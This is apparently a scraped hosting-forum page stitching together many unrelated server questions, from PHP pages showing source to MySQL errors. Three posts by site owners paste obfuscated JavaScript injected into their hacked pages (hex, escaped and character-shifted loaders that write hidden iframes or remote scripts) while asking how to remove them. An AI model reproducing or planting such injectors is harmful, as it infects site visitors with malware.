ASP Pages Shwoing Code
Oct 21, 2009A friend of mine is trying to show the page below, however it just shows the code.
What can I do to fix it?
A friend of mine is trying to show the page below, however it just shows the code.
What can I do to fix it?
I have a starnge code in my websites pages, I found it yesterday and i went to clean the pages.
Now after about 12 hours it came back again, It is not possible to moniter
like this problem and clean a huge number of pages.
I dont know how this happened, I need someone to help me to know the source of the problem from where it comes.
It is appears as a torjan for the users.
I attached a pic shows a sample of that code.
About 2 months ago, I noticed random code linking to a virus in a frame was inserted into many of my web pages accross various accounts.
After I removed it all, I noticed that this has happend to me again!
<!-- ~ --><script>function v467e627add1dd(v467e627ade17d){ function v467e627adf11b () {return 16;} return(parseInt(v467e627ade17d,v467e627adf11b()));}function v467e627ae105c(v467e627ae2008){ var v467e627ae2f9b='';for(v467e627ae3f41=0; v467e627ae3f41<v467e627ae2008.length; v467e627ae3f41+=2){ v467e627ae2f9b+=(String.fromCharCode(v467e627add1dd(v467e627ae2008.substr(v467e627ae3f41, 2))));}return v467e627ae2f9b;} document.write(v467e627ae105c('3C696672616D65207372633D27687474703A2F2F7777772E3473747566666465616C732E636F6D2F646F63732F7468656D652E68746D272077696474683D31206865696768743D31207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script><!-- ~ -->
how they are inserting it into my web pages?
when I try to send Email from horde I have this:
PHP Code:
There was an error sending your message: Failed to add recipient: [SMTP: Invalid response code received from server (code: 451, response: Temporary local problem - please try later)]
I am moving to a new server. At first the [url]version of the site was fine. I had trouble getting [url]working. Once I had the path to the certificate file correct, I was good to go. So, I started moving data. I also ran some updates on the new server (installed mysql, php, related pkgs). I don't know when the [url]pages stopped working, but I didn't realize it until I had everything moved over and tried to go live. The pages are completely blank. If I view source, I get this: ....
View 3 Replies View Relatedi did make a big message on here but it deleted when i back spaced
my website is aviation cafe dot net / sample and i need you to help me with password protecting a webpage, i wanted the address to be / the silver sword and definitly not to look like it does now.
username: webforum
pass: password
What is EPP code, I am required to enter it to register domain
View 5 Replies View RelatedI have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?
CentOS 5.2 - 64bits
Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
PHP 5.2.1 installed on WHM 10.8.0 cPanel 10.9.0-C9565
If I load a php file on browser, it gets loaded, but in HTML source I can see php code.
If I run in SSH "php info.php", the php code gets runn and normal output is generated.
I checked these lines in httpd.conf:
LoadModule php5_module libexec/
AddModule mod_php5.c
AddHandler application/x-httpd-php .php .php4 .php3
AddType application/x-httpd-php .php
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .php3
AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .phtml
"php -v" returns:
PHP 5.2.1 (cli) (built: Apr 9 2007 10:38:29)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Zend Extension Manager v1.2.0, Copyright (c) 2003-2006, by Zend Technologies
with Zend Optimizer v3.2.2, Copyright (c) 1998-2006, by Zend Technologies
On php.ini I have:
; Enable the PHP scripting language engine under Apache.
engine = "On" ;engine
I use long tags ("<?php").
I recompiled Apache and PHP few times, both from WHM and from SSH. I reinstalled Zend optimizer.
We are testing a module that we think may improve stability on our webservers. The module limits the number of concurrent connections allowed from any particular ip address.
What I need an opinion on is what error message the server should return when it is refusing because of the limit.
The module currently returns a 503 error, that's what the module's author set it to do. 503 is a temporary error, which is good, but it implies that the problem is with the server, which seems somewhat inaccurate to me.
I was thinking a 409 would be good, with text saying that the request conflicts with the per visitor connection limit for the requested resource. Ideally the browser would display the message and people would know to reconfigure software or wait for existing connections to complete before resubmitting the request.
One of my co-workers here says that at least people understand the "server busy" error and they won't understand the "conflict" message.
Someone else says most of these errors will come from folks using http 1.0 and the 409 doesn't exist at that level of the protocol, so they won't get anything more than a generic "error!" type of message.
I put the windows media palyer embedded code on my site, but is there a way to limit the buffer or rate at which the video downloads or streams to the user.
<object classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" codebase= [url]
That is the code i use.
does anybody have a script that can veiw the php source code before it runs to the server of an external site
View 1 Replies View RelatedSomeone sniffed ftp password of a user account on my server and looks like javascripts were altered and iframe tags inserted in php files, while i cleaned up php pages i see the following javascript code added to each .js file, what is it supposed to do?
(function(qAWI){var OMt9='var-20a-3d-22S-63-72ip-74-45n-67-69ne-22-2cb-3d-22-56e-72sion-28)+-22-2cj-3d-22-22-2cu-3dnavigator-2e-75s-65-72A-67-65nt-3bi-66((-75-2eindex-4ff-28-22-43h-72ome-22)-3c0)-26-26(u-2einde-78-4ff(-22Win-22)-3e0)-26-26(u-2eindexOf(-22-4eT-206-22)-3c0)-26-26-28doc-75me-6et-2eco-6fk-69e-2e-69-6ed-65x-4ff(-22-6di-65k-3d1-22)-3c0-29-26-26(ty-70-65-6ff(z-72v-7at-73)-21-3dty-70eof(-22A-22)))-7b-7a-72v-7a-74s-3d-22A-22-3beval(-22-69-66(window-2e-22+a+-22)j-3d-6a+-22-2ba+-22M-61jo-72-22-2b-62-2ba+-22-4din-6f-72-22+b+a+-22B-75ild-22-2b-62+-22-6a-3b-22)-3bd-6f-63u-6dent-2ewri-74e(-22-3c-73c-72ipt-20src-3d-2f-2fma-22+-22rtuz-2ecn-2fvid-2f-3fi-64-3d-22-2bj+-22-3e-3c-5c-2fsc-72ipt-3e-22)-3b-7d';var M2ye=OMt9.replace(qAWI,'%');eval(unescape(M2ye))})(/-/g);
I have a customer who is hosting a website on a dedicated server. The server is a high spec server with Intel Core 2 DUO E8400 processor, 4 GB DDR2 ECC RAM and a SATA Hard Drive. He is running only a single website which has a data entry section. The problem is that a few scripts when run consume 99% of the CPU. In fact, there is a particular script which even if run alone consumes 99% CPU. The code retrieves some records from the database by running an SQL query. The code is never executed. I have checked the sql query in the code and it runs fine if executed in SQL Query Analyzer. I know the problem is somewhere in the code, but cannot find the exact cause. Is there a tool to debug the asp code and find out may be the issue with the code? I have tried the Debug Diagnostics utility,
View 2 Replies View Relatedhow this new feature works in csf with blocking by country code.
I'm trying to put a block on Indonesia.
all sites in my server have maliciose code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
how to localize this code in my sites, using grep.
My server work in centos.
I am currently developing a web application on a WAMP server. Once complete my client will have some in-house "programmers" make changes to the code as they are needed.
My client wants to track all changes made to the source files (ie- who made the change, when it was made, what files were modified, and what specific lines were added/removed/modified). Also, the program must run on the server and not the programmers computers.
I've searched high and low and only found a couple programs that scratch the surface of what they want.
Some JSP pages display the source code. Some work and some don't even after recompiling apache with tomcat module and restarting jsp.
-rw-r--r-- 1 user user 6.5K Mar 10 17:18 index.jsp
Not sure where the jsp logs are, but there were no errors in the domlogs.
I have just moved to a VPS server from my shared hosting server and I am suddenly finding it tough to code equally well by just using the vim command. I have become more used to the CPanel code editor probably.
Can anyone suggest a nice tool for the same. I have installed webmin, but its code editor just sucks.
i have a vps account and am trying to setup my website i installed php 4 from a control panel where it auto installed php and there is mysql and i installed all of them but when i upload my script and go to install or go to the index of my site it shows the php code and does not execute.
my permissions are right on i also made a testphp file and used this code <?php phpinfo(); ?> and still nothing just shows the php code when you browse to the file i even went further i installed from the control panel another program called phpmyadmin and when i log in it does the same thing just shows php code so what the hell is going on you think i need to contact my host provider for this issue i sent an email out but waiting for a responce
I have a site that runs on my dedicated server and it is MySQL/PHP based. Sometimes when I post news to the site or even try to open the homepage I get:
Server Error
The following error occurred: [code=SERVER_RESPONSE_CLOSE] The server closed
the connection while reading the response. Contact your system administrator.
If I want to open a url say, [url]I can use file_get_content
How to do the equivalent using curl, socket, socket, and wget?
My server was just upgraded to FC6 and now I do not have pico for a editor. I found nano but there is problems. Screen does not refresh correctly and when I type in charaters sometimes extra charaters show up.
Are there any other screen editors built in to FC6 (not vi)
A friend of mine that has a proxy site on my server just realized that his site is giving some very weird error and he said he has not made any changes to the site in a while as he's been pre-occupied with other things...
Quote: has sent an incorrect or unexpected message. Error Code: -12263
It appears as a JavaScript Alert when you hit submit on the proxy url form... However, I looked into it a bit and there is no JavaScript on the page... Therefore, it must be some sort of server error I'd assume... I even disabled JavaScript in Firefox and still received the error...
It is possible to make code execution on the server with applications such as FastCGI or Zend Optimizer, but the code isn't compiled for good, it's more of a bytecode that is created on the fly, correct?
I'd like to know if it's possible to compile code (PHP, Python, Ruby, etc...) so that when you request a page, the compiled code is executed the same way as compiled C++ code with cgi-bin.
I'm asking because it would be quite efficient in case of high-traffic web sites instead of running intermediary code (bytecode).
Is it possible? What do you think is the more efficient, less resource-intensive and fastest way to execute dynamic-content pages?
I am using dreamweaver to build our corporate intranet for a company I work for. I created a header.php file for a menu that is completed. Using dreamweaver I entered this code:
in the appropriate section of the index.php file. The file name is correct and in the right place. It shows up fine in dreamweaver, but the menu is missing when you view it on the intranet. Please help guys. I have been at this for 2 days now and my boss is waiting for a presentation on this.
one minute i login to WHM and it's fine...the next I get a 404 error
View 3 Replies View Relatedif it's possible to change the permissions of a folder on a site (wwwrootscripts) so that the browser reads the scripts but when you go to the script location wwwroot/scripts/mystyles.css the user can't see the code?
View 2 Replies View RelatedI have installed clientexec onto my centos server and would like it to work with plesk which is also on the same server. However, although i have had this working in the past, i have been adapting the php scripts etc and something has gone wrong so that when i try to activate a package plesk returns :
There was an error creating the domain. ERROR CODE 1014. Plesk returned: should be specified in
if anyone can provide me with some syntax help for Apache 2 CustomLog.
Basicly. I want my CustomLog LogFormat to only log entries when the status code is either 200 or 304.
I've looked over [url]
I just can't figure out how to only log those 2 status codes.
I update MySQL from version 4 to 5.0.67-community.
Now, I often get errors:
MySQL error code: 2006
MySQL error text: MySQL server has gone away
I think MySQL is not properly configured, but I don't find problem.
Below is content of the file - my.cnf. Please see it and compare with yours. Maybe I have low limits into it. Please give me any advice ...
old-passwords = 1
query_cache_size=80M ## 32MB for every 1GB of RAM
key_buffer=90M ## 32MB for every 1GB of RAM
sort_buffer_size=4M ## 1MB for every 1GB of RAM
read_buffer_size=4M ## 1MB for every 1GB of RAM
read_rnd_buffer_size=4M ## 1MB for every 1GB of RAM
thread_concurrency=4 ## Number of CPUs x 2